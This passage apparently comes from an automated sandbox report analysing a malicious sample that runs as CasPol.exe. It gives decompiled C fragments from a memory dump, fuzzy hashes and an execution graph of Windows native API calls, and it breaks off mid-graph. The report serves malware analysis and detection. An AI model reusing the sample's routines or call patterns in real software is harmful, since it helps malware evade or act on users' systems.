                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                                                                                                                                                                                                                            • Instruction ID: bc00a6d921930c6cb3f4f1338418df8015680d89ccc892f0f78b0b11d2697678
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C53160516586F14ED31E836D08BD675AEC28E9720174EC2FEDADA6F2F3C4988408D3A5
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 00420673 Relevance: .1, Instructions: 93COMMONCrypto
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                                            			E00420673(char* _a4) {
				signed int _t30;
				signed int _t35;
				signed int _t36;
				signed int _t55;
				intOrPtr _t56;
				signed int _t66;
				intOrPtr _t67;
				char* _t68;
				signed int _t78;
				signed int _t80;

				_t68 = _a4;
				if(_t68 != 0) {
					if( *_t68 == 0) {
						_t2 = _t68 + 4; // 0xfffd5885
						_t35 =  *_t2;
						 *_t68 = 1;
						_t56 =  *0x7ffe0018;
						_t67 =  *0x7ffe001c;
						if(_t35 == 0) {
							_t36 =  *0x7ffe0014;
							do {
							} while (_t56 != _t67);
						} else {
							_t80 =  *0x7ffe0014;
							do {
							} while (_t56 != _t67);
							_t36 = _t35 * _t80;
						}
						 *(_t68 + 8) = _t36;
						 *(_t68 + 0xc) = 0x492e;
						 *(_t68 + 0x10) = 0xed9;
						 *(_t68 + 0x14) = 0x35c5;
					}
					_t7 = _t68 + 8; // 0xfc33bff
					_t55 = ( *_t7 << 0x00000012 ^  *_t7 >> 0x00000007) & 0x0007ffff ^  *_t7 << 0x00000012 ^  *_t7 >> 0x0000000d;
					_t8 = _t68 + 0xc; // 0x1c084
					_t66 = ( *_t8 >> 0x00000019 ^  *_t8 * 0x00000004) & 0x0000001f ^  *_t8 >> 0x0000001b ^ _t20 + _t20 + _t20 + _t20;
					_t10 = _t68 + 0x10; // 0xd8e85000
					_t23 =  *_t10;
					_t11 = _t68 + 0x14; // 0x8b000120
					_t78 = ( *_t10 >> 0x00000008 ^  *_t10 << 0x00000007) & 0x000007ff ^  *_t10 >> 0x00000015 ^ _t23 << 0x00000007;
					_t12 = _t68 + 0x14; // 0x8b000120
					_t13 = _t68 + 0x14; // 0x8b000120
					_t30 = ( *_t11 << 0x0000000d ^  *_t11 >> 0x00000009) & 0x000fffff ^  *_t12 >> 0x0000000c ^  *_t13 << 0x0000000d;
					 *(_t68 + 0x14) = _t30;
					 *(_t68 + 0x10) = _t78;
					 *(_t68 + 8) = _t55;
					 *(_t68 + 0xc) = _t66;
					return (_t30 ^ _t78 ^ _t66 ^ _t55) >> 1;
				} else {
					return 0;
				}
			}













                                                                                                                                                                                                                                                                                                                            0x00420677
                                                                                                                                                                                                                                                                                                                            0x0042067c
                                                                                                                                                                                                                                                                                                                            0x00420688
                                                                                                                                                                                                                                                                                                                            0x0042068a
                                                                                                                                                                                                                                                                                                                            0x0042068a
                                                                                                                                                                                                                                                                                                                            0x0042068d
                                                                                                                                                                                                                                                                                                                            0x00420690
                                                                                                                                                                                                                                                                                                                            0x00420696
                                                                                                                                                                                                                                                                                                                            0x0042069e
                                                                                                                                                                                                                                                                                                                            0x004206af
                                                                                                                                                                                                                                                                                                                            0x004206b4
                                                                                                                                                                                                                                                                                                                            0x004206b4
                                                                                                                                                                                                                                                                                                                            0x004206a0
                                                                                                                                                                                                                                                                                                                            0x004206a0
                                                                                                                                                                                                                                                                                                                            0x004206a6
                                                                                                                                                                                                                                                                                                                            0x004206a6
                                                                                                                                                                                                                                                                                                                            0x004206aa
                                                                                                                                                                                                                                                                                                                            0x004206aa
                                                                                                                                                                                                                                                                                                                            0x004206b8
                                                                                                                                                                                                                                                                                                                            0x004206bb
                                                                                                                                                                                                                                                                                                                            0x004206c2
                                                                                                                                                                                                                                                                                                                            0x004206c9
                                                                                                                                                                                                                                                                                                                            0x004206c9
                                                                                                                                                                                                                                                                                                                            0x004206d0
                                                                                                                                                                                                                                                                                                                            0x004206ef
                                                                                                                                                                                                                                                                                                                            0x004206f1
                                                                                                                                                                                                                                                                                                                            0x00420710
                                                                                                                                                                                                                                                                                                                            0x00420712
                                                                                                                                                                                                                                                                                                                            0x00420712
                                                                                                                                                                                                                                                                                                                            0x00420731
                                                                                                                                                                                                                                                                                                                            0x00420734
                                                                                                                                                                                                                                                                                                                            0x00420740
                                                                                                                                                                                                                                                                                                                            0x0042074d
                                                                                                                                                                                                                                                                                                                            0x00420753
                                                                                                                                                                                                                                                                                                                            0x00420755
                                                                                                                                                                                                                                                                                                                            0x0042075a
                                                                                                                                                                                                                                                                                                                            0x00420763
                                                                                                                                                                                                                                                                                                                            0x00420766
                                                                                                                                                                                                                                                                                                                            0x0042076d
                                                                                                                                                                                                                                                                                                                            0x0042067e
                                                                                                                                                                                                                                                                                                                            0x00420682
                                                                                                                                                                                                                                                                                                                            0x00420682

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d68e66fa968d3d23d4568bd93700911a56d707b6997fafd5017c9156208794cb
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7fd2a09559c324782709e18a4b4e144f994f0b8a7c6aa12522722d336708b623
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d68e66fa968d3d23d4568bd93700911a56d707b6997fafd5017c9156208794cb
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F31DF72B106265BD354CE3AD880656B3E2FBC8310B94863AD918D3B41E778F971CBD0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 00401BA0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5d62e20affbfb1940e48926a40a50533d8d0d9baee18dfccc96b02a0d8e8670f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ff94d1dcfd0ae70f2e938e93111e91d3334a7d38185bdeb52fa060b6f0c147da
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d62e20affbfb1940e48926a40a50533d8d0d9baee18dfccc96b02a0d8e8670f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C531D176B006104FD71C8E45D494A66B7A3ABC8350B1AC27ECA1A5B3E1DA74AD10C7D0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 00401B8C Relevance: .1, Instructions: 78COMMONCrypto
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                                                                                                            			E00401B8C(signed int __eax, void* __ebx, void* __ecx) {
				signed int _t23;
				void* _t26;
				void* _t88;
				void* _t89;

				_pop(es);
				_t26 = __ebx - 1;
				 *((intOrPtr*)(__eax + 0x55)) =  *((intOrPtr*)(__eax + 0x55)) + 1;
				_t89 = _t88 + 1;
				asm("cld");
				_t23 = __eax ^ 0x9b1983a2;
				if (_t23 <= 0) goto L12;
				_push(_t89);
			}







                                                                                                                                                                                                                                                                                                                            0x00401b8c
                                                                                                                                                                                                                                                                                                                            0x00401b8d
                                                                                                                                                                                                                                                                                                                            0x00401b94
                                                                                                                                                                                                                                                                                                                            0x00401b98
                                                                                                                                                                                                                                                                                                                            0x00401b99
                                                                                                                                                                                                                                                                                                                            0x00401b9a
                                                                                                                                                                                                                                                                                                                            0x00401b9f
                                                                                                                                                                                                                                                                                                                            0x00401ba0

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b169ccc92afeb4f164fa0efac72f655fce3c0182ea891d5547fb24393e9b0b2d
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 622caca710c0991f492370844f4e284809be4499a64592662b4a5dc2c9125e13
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b169ccc92afeb4f164fa0efac72f655fce3c0182ea891d5547fb24393e9b0b2d
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0721C672B006114FD75C8E95D494566B753ABC8350B4AC27ECE2E9B3D2D974ED11C7C0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                                                                            Execution Coverage:7.8%
                                                                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                            Signature Coverage:2.1%
                                                                                                                                                                                                                                                                                                                            Total number of Nodes:1088
                                                                                                                                                                                                                                                                                                                            Total number of Limit Nodes:125
                                                                                                                                                                                                                                                                                                                            execution_graph 27240 3309540 LdrInitializeThunk 27243 76b4d5 27254 76e2a0 27243->27254 27245 76b606 27246 76b50b 27246->27245 27257 75b170 27246->27257 27248 76b54b 27261 7677c0 27248->27261 27250 76b580 Sleep 27251 76b570 27250->27251 27251->27245 27251->27250 27266 76b140 LdrLoadDll 27251->27266 27267 76b320 LdrLoadDll 27251->27267 27268 76c960 27254->27268 27258 75b194 27257->27258 27259 75b19b 27258->27259 27260 75b1d0 LdrLoadDll 27258->27260 27259->27248 27260->27259 27262 7677ce 27261->27262 27263 7677da 27261->27263 27262->27263 27275 767c40 LdrLoadDll 27262->27275 27263->27251 27265 76792c 27265->27251 27266->27251 27267->27251 27271 76d3f0 27268->27271 27270 76c97c 27270->27246 27272 76d3ff 27271->27272 27274 76d475 27271->27274 27273 7677c0 LdrLoadDll 27272->27273 27272->27274 27273->27274 27274->27270 27275->27265 27276 759730 27277 759755 27276->27277 27278 75b170 LdrLoadDll 27277->27278 27279 759788 27278->27279 27281 7597ad 27279->27281 27282 75cd30 27279->27282 27283 75cd5c 27282->27283 27293 76c600 27283->27293 27286 75cd7c 27286->27281 27290 75cdb7 27304 76c8b0 27290->27304 27292 75cdda 27292->27281 27294 76d3f0 LdrLoadDll 27293->27294 27295 75cd75 27294->27295 27295->27286 27296 76c640 27295->27296 27297 76d3f0 LdrLoadDll 27296->27297 27298 76c65c 27297->27298 27307 3309710 LdrInitializeThunk 27298->27307 27299 75cd9f 27299->27286 27301 76cc30 27299->27301 27302 76d3f0 LdrLoadDll 27301->27302 27303 76cc4f 27302->27303 27303->27290 27305 76d3f0 LdrLoadDll 27304->27305 27306 76c8cc NtClose 27305->27306 27306->27292 27307->27299 27308 757dc0 27309 757dd6 27308->27309 27317 757f61 27309->27317 27318 757980 9 API calls 27309->27318 27311 757ed5 27311->27317 27319 757b90 10 API calls 27311->27319 27313 757f03 27313->27317 27320 76c320 27313->27320 27318->27311 27319->27313 27321 76d3f0 LdrLoadDll 27320->27321 27322 76c33c 27321->27322 27326 330967a 27322->27326 27323 757f38 27323->27317 27325 76c920 LdrLoadDll 27323->27325 27325->27317 27327 3309681 27326->27327 27328 330968f LdrInitializeThunk 27326->27328 27327->27323 27328->27323 27329 77149d 27332 76dec0 27329->27332 27333 76dee6 27332->27333 27340 75a100 27333->27340 27335 76def2 27336 76df20 27335->27336 27348 759110 27335->27348 27380 76cad0 27336->27380 27341 75a10d 27340->27341 27383 75a050 27340->27383 27343 75a114 27341->27343 27395 759ff0 27341->27395 27343->27335 27349 759137 27348->27349 27822 75b640 27349->27822 27351 759149 27826 75b390 27351->27826 27353 75917b 27360 759182 27353->27360 27869 75b2c0 LdrLoadDll 27353->27869 27355 75943d 27355->27336 27357 7591f5 27357->27355 27358 76e400 LdrLoadDll 27357->27358 27359 75920b 27358->27359 27361 76e400 LdrLoadDll 27359->27361 27360->27355 27830 75e310 27360->27830 27362 75921c 27361->27362 27363 76e400 LdrLoadDll 27362->27363 27364 75922d 27363->27364 27842 75c8b0 27364->27842 27366 759237 27367 7673b0 9 API calls 27366->27367 27368 759248 27367->27368 27369 7673b0 9 API calls 27368->27369 27370 759259 27369->27370 27371 75927d 27370->27371 27372 7673b0 9 API calls 27370->27372 27373 7673b0 9 API calls 27371->27373 27379 7592c5 27371->27379 27374 759276 27372->27374 27376 759294 27373->27376 27870 75ca00 LdrLoadDll 27374->27870 27376->27379 27871 75d3a0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 27376->27871 27379->27355 27854 758d90 27379->27854 27381 76d3f0 LdrLoadDll 27380->27381 27382 76caef 27381->27382 27414 76b050 27383->27414 27387 75a076 27387->27341 27388 75a06c 27388->27387 27421 76d770 27388->27421 27390 75a0b3 27390->27387 27432 759e90 27390->27432 27392 75a0d3 27438 7598f0 LdrLoadDll 27392->27438 27394 75a0e5 27394->27341 27804 76da60 27395->27804 27398 76da60 LdrLoadDll 27399 75a021 27398->27399 27400 76da60 LdrLoadDll 27399->27400 27401 75a03a 27400->27401 27402 75e0d0 27401->27402 27403 75e0e9 27402->27403 27808 75b4c0 27403->27808 27405 75e0fc 27406 76c600 LdrLoadDll 27405->27406 27407 75e10b 27406->27407 27413 75a125 27407->27413 27812 76cbf0 27407->27812 27409 75e122 27412 75e14d 27409->27412 27815 76c680 27409->27815 27411 76c8b0 2 API calls 27411->27413 27412->27411 27413->27335 27415 76b05f 27414->27415 27416 7677c0 LdrLoadDll 27415->27416 27417 75a063 27416->27417 27418 76af10 27417->27418 27439 76ca20 27418->27439 27422 76d789 27421->27422 27442 7673b0 27422->27442 27424 76d7a1 27425 76d7aa 27424->27425 27481 76d5b0 27424->27481 27425->27390 27427 76d7be 27427->27425 27428 76c320 2 API calls 27427->27428 27429 76d7f2 27428->27429 27498 76e320 27429->27498 27782 757680 27432->27782 27434 759eb1 27434->27392 27435 759eaa 27435->27434 27795 757940 27435->27795 27438->27394 27440 76d3f0 LdrLoadDll 27439->27440 27441 76af25 27440->27441 27441->27388 27443 7676f3 27442->27443 27453 7673c4 27442->27453 27443->27424 27446 7674e2 27446->27424 27447 7674f5 27507 76c780 27447->27507 27448 7674d8 27504 76c880 27448->27504 27451 76751c 27452 76e320 2 API calls 27451->27452 27457 767528 27452->27457 27453->27443 27501 76c070 27453->27501 27454 7676b7 27455 76c8b0 2 API calls 27454->27455 27458 7676be 27455->27458 27456 7676cd 27564 7670d0 27456->27564 27457->27446 27457->27454 27457->27456 27461 7675c0 27457->27461 27458->27424 27460 7676e0 27460->27424 27462 767627 27461->27462 27464 7675cf 27461->27464 27462->27454 27463 76763a 27462->27463 27603 76c700 27463->27603 27466 7675d4 27464->27466 27467 7675e8 27464->27467 27602 766f90 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 27466->27602 27468 767605 27467->27468 27469 7675ed 27467->27469 27468->27458 27522 766d50 27468->27522 27510 767030 27469->27510 27474 7675de 27474->27424 27475 7675fb 27475->27424 27477 76769a 27479 76c8b0 2 API calls 27477->27479 27478 76761d 27478->27424 27480 7676a6 27479->27480 27480->27424 27482 76d5cb 27481->27482 27483 76d5dd 27482->27483 27484 76e2a0 LdrLoadDll 27482->27484 27483->27427 27485 76d5fd 27484->27485 27629 7669b0 27485->27629 27487 76d620 27487->27483 27488 7669b0 2 API calls 27487->27488 27491 76d642 27488->27491 27490 76d6ca 27492 76d6da 27490->27492 27756 76d370 LdrLoadDll 27490->27756 27491->27483 27661 767d10 27491->27661 27672 76d1e0 27492->27672 27495 76d708 27751 76c2e0 27495->27751 27497 76d732 27497->27427 27779 76ca90 27498->27779 27500 76d81c 27500->27390 27502 76d3f0 LdrLoadDll 27501->27502 27503 7674a9 27502->27503 27503->27446 27503->27447 27503->27448 27505 76c89c NtDeleteFile 27504->27505 27506 76d3f0 LdrLoadDll 27504->27506 27505->27446 27506->27505 27508 76d3f0 LdrLoadDll 27507->27508 27509 76c79c NtCreateFile 27508->27509 27509->27451 27511 76704c 27510->27511 27512 76c700 LdrLoadDll 27511->27512 27513 76706d 27512->27513 27514 767074 27513->27514 27515 767088 27513->27515 27516 76c8b0 2 API calls 27514->27516 27517 76c8b0 2 API calls 27515->27517 27519 76707d 27516->27519 27518 767091 27517->27518 27608 76e440 LdrLoadDll 27518->27608 27519->27475 27521 76709c 27521->27475 27523 766dce 27522->27523 27524 766d9b 27522->27524 27526 766f19 27523->27526 27530 766dea 27523->27530 27525 76c700 LdrLoadDll 27524->27525 27527 766db6 27525->27527 27528 76c700 LdrLoadDll 27526->27528 27529 76c8b0 2 API calls 27527->27529 27537 766f34 27528->27537 27532 766dbf 27529->27532 27531 76c700 LdrLoadDll 27530->27531 27533 766e05 27531->27533 27532->27478 27535 766e21 27533->27535 27536 766e0c 27533->27536 27540 766e26 27535->27540 27541 766e3c 27535->27541 27539 76c8b0 2 API calls 27536->27539 27621 76c740 LdrLoadDll 27537->27621 27538 766f6e 27542 76c8b0 2 API calls 27538->27542 27543 766e15 27539->27543 27544 76c8b0 2 API calls 27540->27544 27548 766e41 27541->27548 27617 76e400 27541->27617 27545 766f79 27542->27545 27543->27478 27546 766e2f 27544->27546 27545->27478 27546->27478 27551 766e53 27548->27551 27609 76c830 27548->27609 27550 766ea7 27552 766ebe 27550->27552 27620 76c6c0 LdrLoadDll 27550->27620 27551->27478 27554 766ec5 27552->27554 27555 766eda 27552->27555 27556 76c8b0 2 API calls 27554->27556 27557 76c8b0 2 API calls 27555->27557 27556->27551 27558 766ee3 27557->27558 27559 766f0f 27558->27559 27612 76e120 27558->27612 27559->27478 27561 766efa 27562 76e320 2 API calls 27561->27562 27563 766f03 27562->27563 27563->27478 27565 76c700 LdrLoadDll 27564->27565 27566 76710e 27565->27566 27567 767117 27566->27567 27568 76712c 27566->27568 27569 76c8b0 2 API calls 27567->27569 27570 767150 27568->27570 27571 76719a 27568->27571 27582 767120 27569->27582 27574 76c7e0 2 API calls 27570->27574 27572 7671e0 27571->27572 27573 76719f 27571->27573 27577 7671f2 27572->27577 27581 76736a 27572->27581 27576 76c830 2 API calls 27573->27576 27573->27582 27575 767175 27574->27575 27578 76c8b0 2 API calls 27575->27578 27579 7671ca 27576->27579 27580 7671f7 27577->27580 27589 767232 27577->27589 27578->27582 27583 76c8b0 2 API calls 27579->27583 27584 76c7e0 2 API calls 27580->27584 27581->27582 27587 76c8b0 2 API calls 27581->27587 27582->27460 27585 7671d3 27583->27585 27586 76721a 27584->27586 27585->27460 27590 76c8b0 2 API calls 27586->27590 27591 76739b 27587->27591 27588 767237 27588->27582 27592 76c7e0 2 API calls 27588->27592 27589->27588 27597 767313 27589->27597 27593 767223 27590->27593 27591->27460 27594 767257 27592->27594 27593->27460 27595 76c8b0 2 API calls 27594->27595 27596 767262 27595->27596 27596->27460 27597->27582 27623 76c7e0 27597->27623 27600 76c8b0 2 API calls 27601 76735b 27600->27601 27601->27460 27602->27474 27604 76c704 27603->27604 27605 76d3f0 LdrLoadDll 27604->27605 27606 767682 27605->27606 27607 76c740 LdrLoadDll 27606->27607 27607->27477 27608->27521 27610 76d3f0 LdrLoadDll 27609->27610 27611 76c84c NtReadFile 27610->27611 27611->27550 27613 76e144 27612->27613 27614 76e12d 27612->27614 27613->27561 27614->27613 27615 76e400 LdrLoadDll 27614->27615 27616 76e15b 27615->27616 27616->27561 27619 76e418 27617->27619 27622 76ca50 LdrLoadDll 27617->27622 27619->27548 27620->27552 27621->27538 27622->27619 27624 76d3f0 LdrLoadDll 27623->27624 27625 76c7fc 27624->27625 27628 3309560 LdrInitializeThunk 27625->27628 27626 767352 27626->27600 27628->27626 27630 7669c1 27629->27630 27632 7669c9 27629->27632 27630->27487 27631 766c9c 27631->27487 27632->27631 27757 76f4a0 27632->27757 27634 766a1d 27635 76f4a0 LdrLoadDll 27634->27635 27639 766a28 27635->27639 27636 766a76 27638 76f4a0 LdrLoadDll 27636->27638 27642 766a8a 27638->27642 27639->27636 27765 76f540 LdrLoadDll RtlFreeHeap 27639->27765 27766 76f5d0 27639->27766 27641 766ae7 27643 76f4a0 LdrLoadDll 27641->27643 27642->27641 27645 76f5d0 2 API calls 27642->27645 27644 766afd 27643->27644 27646 766b3a 27644->27646 27648 76f5d0 2 API calls 27644->27648 27645->27642 27647 76f4a0 LdrLoadDll 27646->27647 27649 766b45 27647->27649 27648->27644 27650 76f5d0 2 API calls 27649->27650 27657 766b7f 27649->27657 27650->27649 27653 76f500 2 API calls 27654 766c7e 27653->27654 27655 76f500 2 API calls 27654->27655 27656 766c88 27655->27656 27658 76f500 2 API calls 27656->27658 27762 76f500 27657->27762 27659 766c92 27658->27659 27660 76f500 2 API calls 27659->27660 27660->27631 27662 767d21 27661->27662 27663 7673b0 9 API calls 27662->27663 27668 767d37 27663->27668 27664 767d40 27664->27490 27665 767d77 27666 76e320 2 API calls 27665->27666 27667 767d88 27666->27667 27667->27490 27668->27664 27668->27665 27669 767dc3 27668->27669 27670 76e320 2 API calls 27669->27670 27671 767dc8 27670->27671 27671->27490 27772 76d070 27672->27772 27674 76d1f4 27675 76d070 LdrLoadDll 27674->27675 27676 76d1fd 27675->27676 27677 76d070 LdrLoadDll 27676->27677 27678 76d206 27677->27678 27679 76d070 LdrLoadDll 27678->27679 27680 76d20f 27679->27680 27681 76d070 LdrLoadDll 27680->27681 27682 76d218 27681->27682 27683 76d070 LdrLoadDll 27682->27683 27684 76d221 27683->27684 27685 76d070 LdrLoadDll 27684->27685 27686 76d22d 27685->27686 27687 76d070 LdrLoadDll 27686->27687 27688 76d236 27687->27688 27689 76d070 LdrLoadDll 27688->27689 27690 76d23f 27689->27690 27691 76d070 LdrLoadDll 27690->27691 27692 76d248 27691->27692 27693 76d070 LdrLoadDll 27692->27693 27694 76d251 27693->27694 27695 76d070 LdrLoadDll 27694->27695 27696 76d25a 27695->27696 27697 76d070 LdrLoadDll 27696->27697 27698 76d266 27697->27698 27699 76d070 LdrLoadDll 27698->27699 27700 76d26f 27699->27700 27701 76d070 LdrLoadDll 27700->27701 27702 76d278 27701->27702 27703 76d070 LdrLoadDll 27702->27703 27704 76d281 27703->27704 27705 76d070 LdrLoadDll 27704->27705 27706 76d28a 27705->27706 27707 76d070 LdrLoadDll 27706->27707 27708 76d293 27707->27708 27709 76d070 LdrLoadDll 27708->27709 27710 76d29f 27709->27710 27711 76d070 LdrLoadDll 27710->27711 27712 76d2a8 27711->27712 27713 76d070 LdrLoadDll 27712->27713 27714 76d2b1 27713->27714 27715 76d070 LdrLoadDll 27714->27715 27716 76d2ba 27715->27716 27717 76d070 LdrLoadDll 27716->27717 27718 76d2c3 27717->27718 27719 76d070 LdrLoadDll 27718->27719 27720 76d2cc 27719->27720 27721 76d070 LdrLoadDll 27720->27721 27722 76d2d8 27721->27722 27723 76d070 LdrLoadDll 27722->27723 27724 76d2e1 27723->27724 27725 76d070 LdrLoadDll 27724->27725 27726 76d2ea 27725->27726 27727 76d070 LdrLoadDll 27726->27727 27728 76d2f3 27727->27728 27729 76d070 LdrLoadDll 27728->27729 27730 76d2fc 27729->27730 27731 76d070 LdrLoadDll 27730->27731 27732 76d305 27731->27732 27733 76d070 LdrLoadDll 27732->27733 27734 76d311 27733->27734 27735 76d070 LdrLoadDll 27734->27735 27736 76d31a 27735->27736 27737 76d070 LdrLoadDll 27736->27737 27738 76d323 27737->27738 27739 76d070 LdrLoadDll 27738->27739 27740 76d32c 27739->27740 27741 76d070 LdrLoadDll 27740->27741 27742 76d335 27741->27742 27743 76d070 LdrLoadDll 27742->27743 27744 76d33e 27743->27744 27745 76d070 LdrLoadDll 27744->27745 27746 76d34a 27745->27746 27747 76d070 LdrLoadDll 27746->27747 27748 76d353 27747->27748 27749 76d070 LdrLoadDll 27748->27749 27750 76d35c 27749->27750 27750->27495 27752 76d3f0 LdrLoadDll 27751->27752 27753 76c2fc 27752->27753 27778 3309860 LdrInitializeThunk 27753->27778 27754 76c313 27754->27497 27756->27492 27758 76f4b6 27757->27758 27759 76f4b0 27757->27759 27760 76e400 LdrLoadDll 27758->27760 27759->27634 27761 76f4dc 27760->27761 27761->27634 27763 766c74 27762->27763 27764 76e320 2 API calls 27762->27764 27763->27653 27764->27763 27765->27639 27767 76f540 27766->27767 27768 76f59d 27767->27768 27769 76e400 LdrLoadDll 27767->27769 27768->27639 27770 76f57a 27769->27770 27771 76e320 2 API calls 27770->27771 27771->27768 27773 76d08b 27772->27773 27774 7677c0 LdrLoadDll 27773->27774 27775 76d0ab 27774->27775 27776 7677c0 LdrLoadDll 27775->27776 27777 76d15f 27775->27777 27776->27777 27777->27674 27777->27777 27778->27754 27780 76d3f0 LdrLoadDll 27779->27780 27781 76caac RtlFreeHeap 27780->27781 27781->27500 27783 757690 27782->27783 27784 75768b 27782->27784 27785 76e2a0 LdrLoadDll 27783->27785 27784->27435 27791 7576b5 27785->27791 27786 757718 27786->27435 27787 76c2e0 2 API calls 27787->27791 27788 75771e 27790 757744 27788->27790 27792 76c9e0 2 API calls 27788->27792 27790->27435 27791->27786 27791->27787 27791->27788 27794 76e2a0 LdrLoadDll 27791->27794 27798 76c9e0 27791->27798 27793 757735 27792->27793 27793->27435 27794->27791 27796 76c9e0 2 API calls 27795->27796 27797 75795e 27796->27797 27797->27392 27799 76d3f0 LdrLoadDll 27798->27799 27800 76c9fc 27799->27800 27803 33096e0 LdrInitializeThunk 27800->27803 27801 76ca13 27801->27791 27803->27801 27805 76da83 27804->27805 27806 75b170 LdrLoadDll 27805->27806 27807 75a00d 27806->27807 27807->27398 27810 75b4e3 27808->27810 27809 75b560 27809->27405 27810->27809 27820 76c0b0 LdrLoadDll 27810->27820 27813 76d3f0 LdrLoadDll 27812->27813 27814 76cc0f LookupPrivilegeValueW 27813->27814 27814->27409 27816 76c69c 27815->27816 27817 76d3f0 LdrLoadDll 27815->27817 27821 3309910 LdrInitializeThunk 27816->27821 27817->27816 27818 76c6bb 27818->27412 27820->27809 27821->27818 27823 75b667 27822->27823 27824 75b4c0 LdrLoadDll 27823->27824 27825 75b6ca 27824->27825 27825->27351 27827 75b3b4 27826->27827 27872 76c0b0 LdrLoadDll 27827->27872 27829 75b3ee 27829->27353 27831 75e33c 27830->27831 27832 75b640 LdrLoadDll 27831->27832 27833 75e34e 27832->27833 27873 75e1e0 27833->27873 27836 75e381 27838 75e392 27836->27838 27841 76c8b0 2 API calls 27836->27841 27837 75e369 27839 75e374 27837->27839 27840 76c8b0 2 API calls 27837->27840 27838->27357 27839->27357 27840->27839 27841->27838 27843 75c8c6 27842->27843 27844 75c8d0 27842->27844 27843->27366 27845 75b4c0 LdrLoadDll 27844->27845 27846 75c941 27845->27846 27847 75b390 LdrLoadDll 27846->27847 27848 75c955 27847->27848 27849 75c978 27848->27849 27850 75b4c0 LdrLoadDll 27848->27850 27849->27366 27851 75c994 27850->27851 27852 7673b0 9 API calls 27851->27852 27853 75c9e9 27852->27853 27853->27366 27892 75e5d0 27854->27892 27856 759101 27856->27355 27857 758daa 27857->27856 27898 766ce0 27857->27898 27859 76f4a0 LdrLoadDll 27860 758fa2 27859->27860 27862 76f5d0 2 API calls 27860->27862 27861 758e06 27861->27856 27861->27859 27867 758fb7 27862->27867 27863 757680 3 API calls 27863->27867 27867->27856 27867->27863 27868 757940 2 API calls 